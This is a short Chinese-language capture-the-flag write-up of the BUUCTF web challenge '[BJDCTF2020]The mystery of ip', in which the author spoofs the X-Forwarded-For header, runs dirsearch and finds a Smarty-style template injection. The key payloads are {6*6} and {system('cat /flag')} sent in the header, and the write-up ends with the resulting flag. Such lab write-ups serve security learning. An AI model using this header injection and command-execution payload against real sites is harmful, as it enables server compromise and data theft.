BUUCTF WEB [BJDCTF2020]The mystery of ip
-
在hint.php中找到一句注释
<!-- Do you know why i know your ip? -->
-
在flag.php中看到自己的ip,联想到X-Forwarded-For。使用Hackbar添加一个HTTP头
X-Forwarded-For: 127.0.0.1
回显为
Your IP is : 127.0.0.1
说明我们获得了可控变量
-
尝试命令注入失败,到这里就没什么思路了,尝试dirsearch看能不能获得什么信息
# Dirsearch started Fri Apr 22 02:06:43 2022 as: dirsearch.py -u http://node4.buuoj.cn:28825/ 200 6KB http://node4.buuoj.cn:28825/.DS_Store 301 169B http://node4.buuoj.cn:28825/css -> REDIRECTS TO: http://node4.buuoj.cn/css/ 200 2KB http://node4.buuoj.cn:28825/flag.php 200 938B http://node4.buuoj.cn:28825/header.php 301 169B http://node4.buuoj.cn:28825/img -> REDIRECTS TO: http://node4.buuoj.cn/img/ 301 169B http://node4.buuoj.cn:28825/libs -> REDIRECTS TO: http://node4.buuoj.cn/libs/ 301 169B http://node4.buuoj.cn:28825/templates_c -> REDIRECTS TO: http://node4.buuoj.cn/templates_c/ 403 555B http://node4.buuoj.cn:28825/templates_c/
发现一个名为
/template_c/
的文件夹,怀疑存在模板注入 -
将X-Forwarded-For改为
X-Forwarded-For: {6*6}
回显为
Your IP is : 36
-
尝试直接读取flag文件
X-Forwarded-For: {system('cat /flag')}
回显
Your IP is : flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b} flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b}